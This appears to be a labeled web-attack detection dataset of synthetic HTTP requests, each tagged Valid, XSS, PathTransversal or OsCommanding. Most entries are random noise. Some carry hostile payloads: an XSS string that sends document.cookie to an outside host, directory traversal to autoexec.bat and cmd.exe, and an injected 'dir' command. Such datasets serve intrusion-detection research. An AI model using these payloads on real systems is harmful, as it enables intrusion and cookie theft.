GET /ubBnmAp-/ePvNHCJxcSk/YEchildscriptfOwinnt_KmXPoW/asr/rJCVPGeeg5XOm2O/oe6/wj-M7xqoBm/nf1grssvr/swltt1eLadlqweg34/lOhqeeinrS.tiff?EgahH=22066&Mm5tCU8=naUa1e7xqocso&UmjRpi=aWUK4Cazc&dAaelqomdt=923340&pin5=ttkDd&eet=%24+eradmin%24to+whrDnchilds&ly3tRownsthi=%7C++dir+++++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+++%2C&7group byetc2dQA=767375356&td=casbatrrcp7te37&ehb5tr9l6neex5=an2Czs3uy%28tlocationeaa%25N%7Co&kvuneeetn4f25=seIUh&fSawFO=c&il=a9A6aOfZEXz_ HTTP/1.1
Host: 199.100.74.17:1
Connection: keep-alive
Accept: image/gif;q=0.2
Accept-Charset: iso-2022-kr, windows-1253;q=0.8, x-mac-cyrillic, x-mac-chinesesimp;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: ostgx-8lcr;q=0.5, 4c-arch, asxsl0c-t, e-tvd;q=0.3
Cache-Control: min-fresh=94363
Client-ip: 143.230.118.47
Cookie: O6MZ=y9zz7YLVAP;odcs6ct=537878;r1f=1021522
Cookie2: $Version="71"
Date: Thu, 08 Sep 05 16:31:04 UTC
ETag: W/"olCrtg5FxsS-VvM"
Expect: tceM
From: l6tz5hd@ruglhe.be
If-Modified-Since: Thu, 15 Jun 06 17:11:54 UTC
If-Unmodified-Since: Mon, 05 Sep 05 20:53:22 GMT
If-Match: *
If-None-Match: "Z6GEjEtI2dmmmnOy10A"
If-Range: "F_htP28Xeg29GbgAch"
Max-Forwards: 65
MIME-Version: 7.9
Pragma: crr='n9'
Proxy-Authorization: njdei gtdN=st7gs
Authorization: ashu aliHe=hEgi
Range: -885,-18051
Referer: /hehhko/emep/toduo/nceitmai.png
TE: gzip
Trailer: Host
User-Agent: qSnsNzS/5.2.3.2.5
UA-CPU: StrongARM
UA-Disp: 9370,1809,16
UA-Color: color8
Via: 8.9 www.c9irI4i.tiff
Transfer-Encoding: Tisca
Upgrade: HtwEet/0.9, reet0n/4.1, iaHjtu/0.2
Warning: 976 www.eguwaq.html "ahcm" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42845
Start - Id: 47693
class: XSS
GET /d_O4kCyZRnN5brxg4B/ihnyzkl/ctGOe2AyreRiahsiitr/antIeLuhoe/cb.js?a6eeIReyce=qvyhEofPss5I&xOe4Hul7ae=%3Cimg+dynsrc%3D+%22+javascript%3A++++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.learstie.com%2Fcgi-bin%2Flanindro.cgi%27%2Bdocument.cookie%29%3B%5D+%22++++%3E&rinsl=c5h&IG0hsalne=ekrldeyn+2e&QPvQSFShtpass1C=vtsdt&kr=7164698786&LTbBACposition=le9rntrhwjyX&qed8vonswsesqut=Zo&eci58atda=n+grdllhhpmg%7Eeitukto HTTP/1.0
Host: 114.232.177.0
Connection: close
Accept: */*;q=0.0
Accept-Charset: cp-950;q=0.0, x-mac-arabic;q=0.8, hz-gb-2312
Accept-Encoding: deflate;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 29.159.169.244
Cookie: 1Ohboot.ini8Xk2=0438;Theun=Ebe hucrc-yoE;4sohio7aclo=q89pi;nigjttg8ehtig=inopen;ii4e=0399;yeNi= av
Cookie2: $Version="676"
Date: Sun, 01 Oct 06 09:12:36 CET
ETag: W/"3RHIlr@KyXDlBypEK"
Expect: 4tnsbsi=twdiihsS;wiecasfs=deaot5
From: eh7m@tnOldd.gov
If-Modified-Since: Fri, 27 Nov 09 14:41:42 GMT
If-Unmodified-Since: Mon, 13 Nov 06 17:25:32 GMT
If-Match: *
If-None-Match: *
If-Range: "a-ZpQlzTiI8L.Fl3"
Max-Forwards: 4
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: sxorov avcea=rose
Authorization: Basic Mmhvb29pbzpjaXRlcHQ0dA==
Range: 57-,235-9884,973-85
Referer: http://ttZi.ch/soecg.cfm
TE: trailers,trailers,trailers
Trailer: From
User-Agent: nlrLp3q/5.3.7.8
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 934x7117
Via: 9.4 www.ao3itLj.html, FTP/2.7 104.74.153.1:652
Transfer-Encoding: gzip
Upgrade: e33s9E/0.6
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47693
Start - Id: 16321
class: Valid
GET /eda8wascbo/6WG/vx5UL8GOP1Qqt/slzoAUvy0lVXz/tatrohso2aEc2/eRj1k4Vwwm0t/logNaccess_logBhxvD/ycayGNHV.msf?tii=mhoexstdinAnt%2Bti&nah9oatcst=er0e&oyn5rt=pkMZOtaMPO%40&iMwnCny=ihwanoc%26opt&0esarh7atnmsSax=wanvbscriptif&flnahesos0=24003661&ndrno6snefwhcc=pDxmy-&df2=32025&qA7tsieedeaCqm=ohbf7pformyn&4essie=50&eyoauhe=3&bh7snfc=aKDIqCkMHH&9fvBprocessing-instructionlkcexecoL=a+%7EtlOse&s0stxsa=6&3VAWlsvbscript=selecttf HTTP/1.0
Host: 105.75.155.138:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=9017
Client-ip: 76.128.152.96
Cookie: vtY2=5695;enteycorljiote=dgeTt<;dAttos= mecho'oe;j
Cookie2: $Version="1"
Date: Sat, 02 Feb 08 06:53:45 GMT
ETag: "OIq2z55.cn@ja3WSe625"
Expect: mii8=7pi0yr;blo1=Utnsh
From: fewlhd@mrbErs.biz
If-Modified-Since: Fri, 05 Jan 07 05:30:59 CET
If-Unmodified-Since: Tue, 02 Jan 07 02:01:32 CET
If-Match: "zP9aNbV7wwmMZm3C"
If-None-Match: "9F4ToGyUfty41U9g"
If-Range: "c@o4EuJExI7aVKdFI"
Max-Forwards: 09
MIME-Version: 7.0
Pragma: me15Eiqe=ae7honee
Proxy-Authorization: Digest response="82A7c3FC33BF6ce472e42Ce6b7Ca8D7B"
Authorization: Digest algorithm=MD5-sess
Range: -652120,9-,091-
Referer: /jeyenf/tria1.swf
TE: gzip;q=0.2,trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.3 (X11; U; SunOS sun4u 8.6; 3i-ih; rv:3.0.9) Gecko/72270832
UA-CPU: PowerPC
UA-Disp: 6300,4567,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 295x026
Via: FTP/8.6 www.aqt3n.css
Transfer-Encoding: deflate
Upgrade: znuO/5.9, rnoe23/2.5, sutmh/9.2, Paxtie/5.0, dcrIu3/2.7
Warning: 533 www.sednnp.jpg "tceskevmhah" "Sat, 03 Dec 05 07:14:22 UTC"
X-Forwarded-For: 126.236.238.240
X-Serial-Number: 5823721853014
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16321
Start - Id: 30338
class: Valid
GET /zyE3l/rUg/tsndC7QL5s/edau/p5s/i4RQ/iacl/alEsviaethuh/ifstei.htm? HTTP/1.1
Host: 42.209.40.171
Connection: close
Accept: video/quicktime;q=0.9, image/jpeg;q=0.1, audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=546
Client-ip: 96.68.113.6
Cookie: pbescbn7enad=iraoeipoo44EocWe;H_AwEt=Tprocessing-instruction ;sufcsreu3dlauou=xisFl;idrdirrnoesMhn=u
Cookie2: $Version="894"
Date: Sun, 04 Oct 09 06:54:10 CET
ETag: W/"zQB4kJ0_6WqwCWKPi"
Expect: ehsaEtrk=7enp
From: iaanlhRg@tswhHw.st
If-Modified-Since: Thu, 23 Jun 05 16:14:21 CET
If-Unmodified-Since: Wed, 14 Mar 07 16:12:42 UTC
If-Match: "OWiOB0C1t5lGJdZiJ.00"
If-None-Match: "uqkmKzlc1HpSiVWt.P"
If-Range: "bMAYgkFPriq0IeOvZ5"
Max-Forwards: 30
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic MmZ0bGxjOnBpaXNv
Authorization: Basic YWFuOHB1bzc6ZGNldDZoTA==
Range: 05745-,56-61
Referer: /mbdpd1so.txt
TE: trailers,gzip;q=0.0,gzip;q=0.0
Trailer: Host
User-Agent: Mozilla/4.3 (X11; U; Linux i586 0.0; 3l-gn; rv:7.5.1) Gecko/91099451
UA-CPU: MIPS
UA-Disp: 750,8884,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 754x9370
Via: FTP/7.7 www.ono9.jpg, FTP/1.7 www.l3sarFh.tiff:78715, 4.2 87.201.116.219
Transfer-Encoding: identity
Upgrade: tx2uo/1.4, Ooo8x/2.1
Warning: 632 www.rTe2l.html "hcd9dnnAbmuvu5it" "Sun, 10 Sep 06 21:36:43 GMT"
X-Forwarded-For: 116.208.83.67
X-Serial-Number: 74513644459681946060
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30338
Start - Id: 27640
class: Valid
GET /sci/Wz5/nulldD@I2c35/iN/isunrliAut6tAH/l@/yYRo/Ktt9ua4t9iqso9r/paber3tvpmn/hwuNY/3agvn5U66o.jpg?LFRtdC=on&te91oabjsgtNa=esoba8uueestc&ZfwhereO=%7Etid3apeciat%3E HTTP/1.1
Host: www.4ieOf.st
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=8
Client-ip: 30.208.29.172
Cookie: kdedhsynlgel=eetyishy;tiJnhapc=stu;ttHeuwi29seEcu=mt7rbalon;szeodl7pFe=lYg;MXq4=930939
Cookie2: $Version="8"
Date: Sat, 10 Nov 07 04:46:08 UTC
ETag: W/"Q7FDirU-IyamM8-k"
Expect: do1droar=a2rht
From: Rofmod@oeornsCta.de
If-Modified-Since: Thu, 07 Aug 08 13:11:12 CET
If-Unmodified-Since: Fri, 13 Mar 09 10:47:41 CET
If-Match: "frNL-7GbzDmnUwCBYCg"
If-None-Match: "Ev_ZpSScBJEP.yDQL"
If-Range: *
Max-Forwards: 98
MIME-Version: 0.1
Pragma: clrnrs=qs
Proxy-Authorization: Digest username="evn2i"
Authorization: Digest uri=/qcikst/neagegd/eeos2gt3/asi8i.gif
Range: -88
Referer: http://www.oohbu.de/mHaotT/ewigN/wuo0/eylPt.js
TE: chunked;q=0.8,chunked
Trailer: Via
User-Agent: Mozilla/5.7 (compatible; hzmulCVwt; Open BSD i586; orTtdi)
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0807x3166
Via: 6.9 249.170.231.74:89, cnak/2.7 www.ilxiwsv.css, FTP/8.8 www.wofbel.jpeg:7
Transfer-Encoding: deflate
Upgrade: n5eeiS/7.2
Warning: 259 www.rfDsn.jpg "ohSzyAnhwspipbdtmo" "Tue, 28 Jun 05 14:35:35 GMT"
X-Forwarded-For: 21.17.8.118
X-Serial-Number: 189697977036477
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27640
Start - Id: 45716
class: PathTransversal
GET /lnnzs/eZ02IOOXvqryfAR32TPe/chraetsna9ueteiP.html?assreexeidAap=74255&die=9olimensa&uec=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&e3wm=20660&tesy=e%24eAd&bUth=312&aopiuibYitd=ixvelsw%28nfniselectn%25oto&tiinDOeuol=870598&haKE=07&tsrrdebfaitoA=Thttpse&_OPW=9933&teea=3487 HTTP/1.0
Host: 218.4.1.116
Connection: vi1xHnt
Accept: image/png;q=0.7, video/*, application/x-tar;q=0.7
Accept-Charset: cp-950, cp-950;q=0.4, cp-932, windows-1258;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: y-oe;q=0.5, mueu-hee3n;q=0.6, gs1tY-4;q=0.9, HslRb-egnee, aSurhar-8eea8mew;q=0.3
Cache-Control: max-age=49806
Client-ip: 244.124.85.82
Cookie: 3oroOi1reaouliw=2877807993;n8yen=r@aunione;VHZVxcjR=r9zWEipCmghz
Cookie2: $Version="0"
Date: Sat, 31 Dec 05 20:12:17 CET
ETag: W/"skf@5ex@3kGAQzU0"
Expect: ipgDtc4E
From: reani1tb@daeireeubl.de
If-Modified-Since: Wed, 01 Aug 07 18:39:09 GMT
If-Unmodified-Since: Fri, 05 Dec 08 05:33:23 UTC
If-Match: "_O2__yriN3AkuCtSwCg"
If-None-Match: "wVohVIL27Q2lpzvZGMki"
If-Range: *
Max-Forwards: 2154
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest nonce
Range: -958,-975,-318
Referer: http://r1ruosi.st/c4rf/iiomztSe/uiE8fA.cgi
TE: trailers,chunked;q=0.3,trailers
Trailer: Cache-Control
User-Agent: s3yzXLk http://www.ibwdftkt.net
UA-CPU: x86
UA-Disp: 8763,047,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 967x7308
Via: 7.5 www.6enl.jpeg
Transfer-Encoding: enheoh; vb6aF=haMe2hf
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 139.27.168.135
X-Serial-Number: 1618317
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45716
Start - Id: 34367
class: Valid
PUT /riiUetotcdostlode/oicacpeen5nt/YHLidxX3IZL6uC/0SfmL5sabqPm/qbXMk/o.lt54q/nHTtjylMTgQEciTf1/iit2E/hrsc85s.css? HTTP/1.1
Content-Length: 78
Content-Language: ne,eyoawsr
Content-Encoding: compress
Content-Location: http://www.1n1sinr7.be/eeRalgo/esnh/lmtmm3to/rnuEHs.php4
Content-MD5: ZHN0b250dGl0bGFhZ2ViYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 09 Dec 09 23:29:15 UTC
Last-Modified: Tue, 21 Dec 04 06:54:19 GMT
Host: www.okry31.net
Connection: close
Accept: image/*;q=0.8
Accept-Charset: euc-jp;q=0.1
Accept-Encoding: *
Accept-Language: MmksC-vp;q=0.5, tumu5ka5-londur6a;q=0.2, 1cGsftho-ddlwwWt, sn9sa-eesmye
Cache-Control: max-age=19
Client-ip: 31.83.144.196
Cookie: i3=O$i
Cookie2: $Version="0"
Date: Thu, 16 Oct 08 21:45:47 CET
ETag: "bp3kO-.7uy8DnE."
Expect: eaLgnyhm
From: tvvees@4vk8nsor.be
If-Modified-Since: Fri, 09 Feb 07 19:46:06 CET
If-Unmodified-Since: Thu, 20 Jan 05 22:40:53 UTC
If-Match: *
If-None-Match: "jwVV8zDqWOF9U7rIVjo1"
If-Range: "ll4Y-Ae6zpGfXkff"
Max-Forwards: 4
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM c29vb2ZTUGlmbWw0YWlvZXNIaG90YUhkb2phaW8ybTBVd2FjaQ==
Authorization: Basic bmt1bnNyMzpkcmh0RWli
Range: 2495-218225,-34
Referer: http://www.rveefia.cz/2rshatb5/dunlao.swf
TE: trailers
Trailer: User-Agent
User-Agent: ns1lxln8hmh3ehqls
UA-CPU: x86
UA-Disp: 404,187,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 015x732
Via: 9.4 www.tno5mn.shtml, HTTP/1.4 95.223.223.141
Transfer-Encoding: identity
Upgrade: aa8el/9.2, rti/4.8, dpEae/4.2
Warning: 606 www.ndeoeial.jpg "6j6dwsrejo" 
X-Forwarded-For: 107.108.232.99
X-Serial-Number: 71981796445551996576
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oh1t=zlre-tl&HndsiceetileS=n20d9iAp9eoosen&egahi2yme=sJK2h707A9&NDf8sg-y2zz=65

End - Id: 34367
Start - Id: 1186
class: Valid
GET /eL_uzx/c@/s.t2dPEZ9BZdcf/KpAvbscriptDQVgOP-.E/nPeYIHXSGjfhE/P0bbI6sewinnt2m0zOY.php3?sh4trdaq=6672004&yfkmnYKJJ3=278318&3w6i=5o4Oz0JN8c0&he2oe=t65twNNLRk&NZ_GQk-X9F=728092141&e1Eroa=nahe&satiooO8=936&69mwhcni4ar=8303&Q2samyIOand-8location=tfcghosbtezlo&ta6seayo=4966184571&tHrsa8ant=iK9gty0k&ZchildFbgsoundC@BpIexec=dba HTTP/1.1
Host: www.ltnwt.gov
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-cyrillic, isiri-3342
Accept-Encoding: identity;q=0.7, deflate;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 96.112.94.162
Cookie: itvceatgnmynq=oft09ial
Cookie2: $Version="315"
Date: Sun, 13 Jun 04 02:11:27 GMT
ETag: "PDK5R1bFXa2W3huBM"
Expect: 100-continue
From: Zrheu@etadsj.ch
If-Modified-Since: Sat, 17 Nov 07 15:33:21 CET
If-Unmodified-Since: Sun, 13 Jul 08 16:30:37 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 24 Apr 06 16:23:31 UTC
Max-Forwards: 1
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic dGFjdWcxOmVpejBoZGg=
Authorization: lkjlA esegsRe=acnppi
Range: 8-,346-86
Referer: /rlnciA/tiruarip/s6thOerL/fecfri.exe
TE: deflate;q=0.4,chunked,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.1 (Machintosh; U; PPC Mac OS X 5.3; ts-5r; rv:7.8.9) Gecko/58571133
UA-CPU: PowerPC
UA-Disp: 3549,296,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5650x6286
Via: HTTP/9.1 www.e5aumxae.png:00, 9.9 www.eo4eIetN.shtml:554
Transfer-Encoding: deflate
Upgrade: 3fe/6.8, 1l6r/0.4, neenia/6.4, aut/5.3, uwrb/3.2
Warning: 000 44.117.86.117 "8eny" 
X-Forwarded-For: 161.167.26.165
X-Serial-Number: 60492231
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1186
Start - Id: 11819
class: Valid
GET /ttftzotnbeset/tD6LHZuByaicc/e8rte2r/Ohrfs/6dfqLekq28l_F50d/srn7es/arBZQOYItLeMWE29uZ/Zexec0a/hlsbe75voSeYsehesre.htm?rohumaiw2l=oscript&IUsen=76304026&ZF8HLGji=oiia HTTP/1.1
Host: 98.121.59.159:2
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-korean;q=0.0, iso-8859-1
Accept-Encoding: compress, identity, compress;q=0.9
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 54.230.57.109
Cookie: afmi=ljiW3XwG53xI;serrKe4=89184
Cookie2: $Version="863"
Date: Wed, 07 Jun 06 19:20:31 CET
ETag: "m17lYPb@0k3@X_D"
Expect: 100-continue
From: ltia@luxm.fr
If-Modified-Since: Mon, 09 Aug 04 13:21:09 UTC
If-Unmodified-Since: Mon, 13 Aug 07 06:55:00 CET
If-Match: *
If-None-Match: "Lp92mcAq@zqdhgkoB0iR"
If-Range: *
Max-Forwards: 71
MIME-Version: 9.7
Pragma: 2wS='hrmnn'
Proxy-Authorization: NTLM cndlYVQ0cmVvbnZyZWxyaW50dHRhaXJ0dGx2bnNhb21iaQ==
Authorization: Basic aGJlTmE6dGljY3pJNXU=
Range: 845-,0-,-57
Referer: /eeihnis/Waoey.txt
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.6 (compatible; MSIE 4.2; Win 9x; etatriVhe; hRzIwuese)
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0378x1134
Via: ns4/7.4 252.158.239.206
Transfer-Encoding: aOboi5; fAaznsoi=haaone9k
Upgrade: ptl/3.8, ewttf/4.6, ywn/8.3
Warning: 125 www.knwtlae.shtml "ad0et9kU3d4n6SuMdtN" "Thu, 30 Sep 04 09:26:08 GMT"
X-Forwarded-For: 75.214.139.60
X-Serial-Number: 63208652767395
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 11819
Start - Id: 36601
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 162.98.200.254
Connection: Tssl
Accept: text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: edpoec-cazas, atiE-El, mAcZe-a4n, shrs-r, oa-t;q=0.4
Cache-Control: no-store
Client-ip: 3.238.183.148
Cookie: mP1pjbunionJQ=4;rEzhzeiidEj8eQe=ea:3 Mwelao~reeSyt;nzgWZMC=640
Cookie2: $Version="5"
Date: Wed, 28 Jan 04 17:49:21 CET
ETag: W/"pQOXcIItfLgaCXJGA"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Thu, 28 Sep 06 10:32:44 CET
If-Unmodified-Since: Sun, 28 Jun 09 01:24:08 CET
If-Match: *
If-None-Match: "y3-OKVTeDdF14ozbiQ9"
If-Range: Fri, 22 Oct 04 07:29:51 GMT
Max-Forwards: 46
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Basic aG1pbDk4YzptZTNlcA==
Range: 952-526,59910-,78804-
Referer: http://www.bcEe0rfi.uk/eeAsa/aurha.pdf
TE: gzip
Trailer: Max-Forwards
User-Agent: 66nsIaeikyp5oeryor
UA-CPU: MIPS
UA-Disp: 1925,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: FTP/6.3 72.148.245.251
Transfer-Encoding: deflate
Upgrade: uof/2.1, pIto/5.6, Weac/8.2, o0shyf/1.7
Warning: 079 www.hmte9ks.gif "bsnlaehuereei" 
X-Forwarded-For: 2.248.231.30
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36601
Start - Id: 34422
class: Valid
PUT /0srt/brszda2wimdanrhtna/aDephp/8TtATTNOOsQM/yaI6Cx5j/e1Lnrme/aK%uu/e72bi13n9iK6jgkEvz/cTqe/ako.php4? HTTP/1.1
Content-Length: 73
Content-Language: to,yueDLar,5
Content-Encoding: gzip
Content-Location: /TYeto/lhoTa/emen.txt
Content-MD5: bUxvbGFtZDFuZnFpcmxpcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Feb 06 22:43:41 CET
Last-Modified: Wed, 26 Oct 05 10:29:15 CET
Host: www.ih7ee.fr
Connection: keep-alive
Accept: audio/*
Accept-Charset: big5;q=0.0
Accept-Encoding: identity;q=0.7, identity;q=0.2, identity, gzip;q=0.2, gzip
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 84.198.178.247
Cookie: uhito=mFo;0OjKvbscript@=083;varezvW=eoc;2w-R932UZ=058;dOmkbce82m=eg@g6dqoN7VP;uno=mAQMTN7Q
Cookie2: $Version="64"
Date: Wed, 02 Sep 09 05:24:15 GMT
ETag: W/"klRyVC@w2mtJQIc5LX"
Expect: 100-continue
From: tirtg0@rhu1.org
If-Modified-Since: Mon, 24 Nov 08 05:15:08 GMT
If-Unmodified-Since: Sun, 01 May 05 01:24:14 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 02 May 04 22:53:41 GMT
Max-Forwards: 191
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM NGVlYWllZmRpc3pycm5lRW9OZWhlZnFtZnRFc2NyckVlcw==
Authorization: Digest nonce
Range: -2,-34,732-
Referer: http://dizio.de/otbt/tcsarxn/qnEsafe4/gdr8c.tiff
TE: chunked;q=0.2,gzip;q=0.7,chunked;q=0.8
Trailer: If-Match
User-Agent: roAee (eXC45GmZ; j2zOmAZ0; eMQCR7YdtN; iQ5W5-viv; dWFRQ2r)
UA-CPU: StrongARM
UA-Disp: 7247,384,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 995x932
Via: berm/2.7 180.4.167.59, FTP/3.4 168.205.81.50
Transfer-Encoding: compress
Upgrade: uurtm/9.2, nNnn/0.6, rca/0.5
Warning: 076 www.tlWems.gif "aretamgt" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 3756270
----: -----------
~~~~~: ~~~~~~~~~~~~~~

Fryhc=(&wsafdei5t=bQKARBZGbKp&Weo=arechoEpnjepesock_stream&nVjhIHhps=e6

End - Id: 34422
Start - Id: 34654
class: Valid
POST /u__j9/trfpDr19Was4/ojWBlxt7-.pl? HTTP/1.0
Content-Length: 225
Content-Language: uTsn
Content-Encoding: gzip
Content-Location: /pCqhruof/enweit/sudte4al.pl
Content-MD5: Y2s2Y2VhcGFudXgxVWZvOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 Jan 10 10:46:06 UTC
Last-Modified: Sat, 25 Feb 06 11:57:22 CET
Host: www.eeineaie.gov
Connection: nsoe
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: Rill-i, ef7ms-yvr3iU;q=0.1
Cache-Control: no-cache
Client-ip: 67.93.72.22
Cookie: tuNe=02
Cookie2: $Version="2"
Date: Sat, 21 Aug 04 04:37:54 CET
ETag: "qe_7hAVu7Wn2tFiI"
Expect: 100-continue
From: ollao@ehcaufe.uk
If-Modified-Since: Fri, 04 Dec 09 01:50:57 GMT
If-Unmodified-Since: Wed, 02 Aug 06 09:29:54 CET
If-Match: "w69UL35K@ya9@T2ub"
If-None-Match: *
If-Range: "VQcB07P-yN5GEGI"
Max-Forwards: 3
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM ZWVodXNlcmhIaXNoMGdjZXVXZXp2bzdhbnlPd21ha2hFbmFuQ290dA==
Authorization: NTLM cWt0eTVuRHRTZWNhdGVTZW9tdGZvYW5obnBwSXRpc0ExSXdOYTR0RUVodTBva24=
Range: -31378,040524-,4380-77
Referer: /ll5noctf/1oagyXe/nstha.png
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/7.6 (compatible; Konqueror/1.8; Open BSD i586; 6gjdfr)
UA-CPU: PowerPC
UA-Disp: 379,2037,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3397x406
Via: 7.1 www.UiieU.jpeg, FTP/4.1 61.72.152.86, FTP/7.5 www.er0dw.css:09415
Transfer-Encoding: gzip
Upgrade: 0lmc/3.2
Warning: 527 76.238.80.61 "hris94" 
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 29825760
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

7RyCtmpJ= as&ix=30&HrwidHnsasa=ixatIfGJHm&s3acdewetooaft=niustBaPap&c4eE4sf=systeme|B&igt=homervq&z@0uxR=ugFxyoi&atOreeeacL=4759&mWw.U=Mnshomi&g2jxIX=0Shtacces&acVAinputJU=fromtdivaeeorcpnim2rsdye&ach=ql&ietdhhhc=)dYl ~

End - Id: 34654
Start - Id: 4192
class: Valid
PUT /03/7nullESlU/ddatnjnoftws3ht/r38Uel-yk1d/6fmiaihyn2estl8/bfKVU4AjlPSnlGT/ztwinntGAXo-cOYBZ/aaewweh/Ht.mdb? HTTP/1.0
Content-Length: 34
Content-Language: Ree,RddbW
Content-Encoding: identity
Content-Location: /nHEyh2/EeyP1e.cgi
Content-MD5: dHNlYUx0b2hhZWZpZG5lMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 06 Mar 04 19:53:00 CET
Last-Modified: Thu, 13 Dec 07 12:48:27 CET
Host: www.zbaW.fr:80
Connection: TglspdR
Accept: audio/x-wav, video/mpeg;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.0
Cache-Control: max-age=2
Client-ip: 128.131.127.146
Cookie: oaqut=h_g6rFBeRsB0;vt5ee5bml=sGzQs
Cookie2: $Version="21"
Date: Sat, 25 Sep 04 07:03:04 CET
ETag: "j1fHfPd7.Z7MrOHiNjG"
Expect: 6xsMd
From: tewe@gFoteninnd.com
If-Modified-Since: Tue, 18 Nov 08 03:49:01 UTC
If-Unmodified-Since: Tue, 20 Nov 07 11:47:38 UTC
If-Match: "Qv6P5ERF0Dx3tJTrKjk"
If-None-Match: *
If-Range: *
Max-Forwards: 278
MIME-Version: 8.9
Pragma: zl='eTs'
Proxy-Authorization: NTLM ZmRTY2xhVHQ5Y25zbzZyZXRuaWQzbHJ1ZWFpaTFuYWx0c3VpdGlyNnVkNTRl
Authorization: Basic bkVudGU6ZW90OHU=
Range: -071
Referer: /tsiileh/eeana/gghelz.bin
TE: trailers
Trailer: Referer
User-Agent: shnbg/3.1.2.5.9
UA-CPU: x86
UA-Disp: 1201,427,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 820x313
Via: 0.1 www.eg5tna9.js
Transfer-Encoding: identity
Upgrade: hoPa/4.4, Rhih/0.5
Warning: 509 32.174.131.157 "blmx" "Mon, 22 Dec 08 02:53:51 GMT"
X-Forwarded-For: 145.194.83.222
X-Serial-Number: 70476
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

RdsSif=oasXC&ocHsrk5pdpNdDbr=qx2G4

End - Id: 4192
Start - Id: 43415
class: OsCommanding
